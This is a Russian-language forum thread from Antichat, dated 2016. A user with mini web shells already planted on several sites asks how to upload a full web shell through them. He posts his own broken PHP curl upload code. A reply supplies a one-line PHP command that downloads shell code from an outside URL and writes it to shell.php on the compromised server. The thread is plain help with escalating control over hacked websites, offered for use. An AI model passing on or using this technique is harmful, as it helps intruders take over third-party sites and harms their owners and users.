HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Вопрос по php
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.12.2016, 14:42
CHEBURNATOR
Новичок
Регистрация: 09.05.2015
Сообщений: 14
С нами: 5797046

Репутация: 0
По умолчанию
Всех приветствую.

Необходима помощь в заливке шелла через мини-шелл.

Дано: несколько сайтов с залитым мини шеллом вида

Проверка через HackBar Mozilla показала что phpinfo() выполняется.

allow_url_fopen On

allow_url_include Off

Не могу сказать что хорошо знаю php, скорее в процессе изучения.

Решил попробовать написать скрипт заливки полноценного шелла, но видно где то косячу, скрипт не заливает шелл.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]"@[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$postResult[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR] 
Прошу подсказать где допустил ошибку, возможно подправить код.

Не очень понимаю где я должен в коду разместить переменную "xxx", для отработки минишелла.

Спасибо заранее.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.12.2016, 15:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Код:
file_put_contents('shell.php', file_get_contents('http://site.com/full_shell.txt'));
Где:

shell.php - название файла куда записывать шелл

http://site.com/full_shell.txt - ссылка, откуда качать шелл (исходник, не интерпретируемый).
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.